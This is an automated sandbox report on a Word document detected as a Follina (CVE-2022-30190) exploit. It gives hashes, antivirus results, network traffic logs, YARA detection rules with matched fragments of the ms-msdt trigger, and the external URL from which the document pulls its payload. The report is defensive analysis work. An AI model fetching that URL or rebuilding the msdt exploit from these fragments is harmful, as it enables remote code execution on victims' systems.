Edit tour

Windows Analysis Report
icRTA4gcSe

Overview

General Information

Sample Name:	icRTA4gcSe (renamed file extension from none to docx)
Analysis ID:	685945
MD5:	9873ccaccab0237bf533324f69dff3b3
SHA1:	29d098d9ddf7e425413817089beb2eb14c91bc64
SHA256:	05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198
Infos:

Detection

Follina CVE-2022-30190

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Contains an external reference to another file

Detected suspicious Microsoft Office reference URL

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3024 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	SUSP_Doc_WordXMLRels_May22	Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard, Wojciech Cieslak	0x39:$a1: <Relationships 0x2e5:$a2: TargetMode="External" 0x2dd:$x1: .html!
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x26e:$olerel: relationships/oleObject 0x287:$target1: Target="http 0x2e5:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x45be:$a: PCWDiagnostic 0x45b2:$sa3: ms-msdt 0x4631:$sb3: IT_BrowseForFile=
sslproxydump.pcap	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x45a1:$re1: location.href = "ms-msdt:
sslproxydump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198f:$a: PCWDiagnostic 0x1983:$sa3: ms-msdt 0x1a02:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1972:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198f:$a: PCWDiagnostic 0x1983:$sa3: ms-msdt 0x1a02:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1972:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x198f:$a: PCWDiagnostic 0x1983:$sa3: ms-msdt 0x1a02:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm	EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation	Tobias Michalski, Christian Burkard	0x1972:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 4 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: icRTA4gcSe.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: icRTA4gcSe.docx	Virustotal: Detection: 47%	Perma Link
Source: icRTA4gcSe.docx	Metadefender: Detection: 28%	Perma Link
Source: icRTA4gcSe.docx	ReversingLabs: Detection: 61%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm	Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, type: DROPPED

Detected suspicious Microsoft Office reference URL

Source: document.xml.rels

Extracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!

Source: unknown	HTTPS traffic detected: 3.5.246.192:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 52.95.148.170:443 -> 192.168.2.22:49183 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 3.5.244.102:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.22:49186 -> 3.5.244.102:443 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 3.5.246.192:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 52.95.148.170:443
Source: global traffic	TCP traffic: 52.95.148.170:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 3.5.244.102:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 3.5.244.102:443

Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
Source: global traffic	DNS query: name: sqdocs.s3.eu-west-2.amazonaws.com

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 3.5.246.192:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 3.5.244.102:443
